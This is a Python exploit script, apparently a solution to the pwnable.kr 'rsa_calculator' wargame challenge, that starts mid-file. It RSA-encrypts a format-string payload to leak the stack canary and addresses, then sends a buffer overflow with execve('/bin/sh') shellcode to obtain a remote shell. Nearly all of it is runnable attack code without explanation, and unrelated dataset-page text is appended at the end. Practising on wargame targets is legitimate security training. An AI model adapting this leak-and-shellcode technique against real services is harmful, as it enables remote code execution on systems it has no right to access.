print(process.recv().decode(), end='')
SendLine(process, str(q))
print(process.recv().decode(), end='')
SendLine(process, str(e))
print(process.recv().decode(), end='')
SendLine(process, str(d))
print(process.recv().decode(), end='')
def RSA_encrypt(string : str, n : int, e : int):
byte_string = string.encode()
ret = b''
for x in byte_string:
ret += pack(pow(x, e, n), 32)
return ret.hex()
def LeakInfo(process, n, e):
SendLine(process, '3')
print(process.recv().decode(), end='')
SendLine(process, '-1')
print(process.recv().decode(), end='')
SendLine(process, RSA_encrypt('0x%205$llx,0x%208$llx,0x%207$llx', n, e))
print(process.readuntil('- decrypted result -\n').decode(), end='')
info = process.readline().replace(b'\n', b'').decode()
print(info)
info = info.split(',')
return int(info[0], 16), int(info[1], 16), int(info[2], 16)
def exploit(process, payload):
print(process.recv().decode(), end='')
SendLine(Process, '3')
print(process.recv().decode(), end='')
SendLine(process, '-1')
print(process.recv().decode(), end='')
SendLine(process, payload)
#Process = process(['/home/doublesine/Desktop/rsa_calculator'])
Process = remote('pwnable.kr', 9012)
print(Process.recv().decode(), end='')
p = 30011
q = 30013
n = p * q
phi = (p - 1) * (q - 1)
e = 11
d = xgcd(e, phi)[1]
assert d > 0 and (e * d) % phi == 1
SetKey(Process, p, q, e, d)
canary, rbp, ret_addr = LeakInfo(Process, n, e)
rbp -= 0x100
data_addr = rbp - 0x210
shellcode_start = data_addr + \
16 + \
16 + \
16 + \
16 + \
16
system_addr = ret_addr - 0x40140a + 0x4007c0
print('----------------------------')
print('canary =', hex(canary))
print('rbp =', hex(rbp))
print('ret_addr =', hex(ret_addr))
print('system_addr', hex(system_addr))
print('data_addr =', hex(data_addr))
print('----------------------------')
shellcode = None
try:
shellcode = asm('mov rdi, rsp') + \
asm('mov rax, 59') + \
asm('xor rsi, rsi') + \
asm('xor rdx, rdx') + \
asm('syscall')
except:
shellcode = bytes.fromhex('4889e748c7c03b0000004831f64831d20f05')
whatever_you_want = 123
payload = pack(whatever_you_want, 64).hex().encode().hex() + \
pack(canary, 64).hex().encode().hex() + \
pack(rbp & 0xffffffffffff0000, 64).hex().encode().hex() + \
pack(shellcode_start, 64).hex().encode().hex() + \
b'/bin/sh\x00'.hex().encode().hex() + \
shellcode.hex()
payload += 'a' * (1024 - len(payload))
exploit(Process, payload)
Process.interactive()
|
StarcoderdataPython
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.